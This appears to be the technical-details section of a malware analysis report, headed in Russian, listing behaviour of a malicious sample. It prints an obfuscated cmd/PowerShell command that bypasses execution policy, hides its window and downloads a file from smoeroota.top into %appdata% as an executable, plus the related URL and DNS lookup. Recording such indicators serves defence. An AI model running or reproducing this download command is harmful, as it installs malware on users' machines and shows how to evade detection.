Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OwE^RsHe^LL.EXe ^-e^xEcu^tiOn^pol^IcY bYpAss^ -no^P^rof^ILe -wIn^d^o^W^StyLE ^HiDd^e^n ^(neW-o^bj^E^C^t^ SySTe^m.nEt^.wEBclI^e^NT)^.^doW^NLOA^DFILE('http://smoeroota.top/rea...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "p^OwE^RsHe^LL.EXe ^-e^xEcu^tiOn^pol^IcY bYpAss^ -no^P^rof^ILe -wIn^d^o^W^StyLE ^HiDd^e^n ^(neW-o^bj^E^C^t^ SySTe^m.nEt^.wEBclI^e^NT)^.^doW^NLOA^DFILE('http://smoeroota.top/rea...' (со скрытым окном)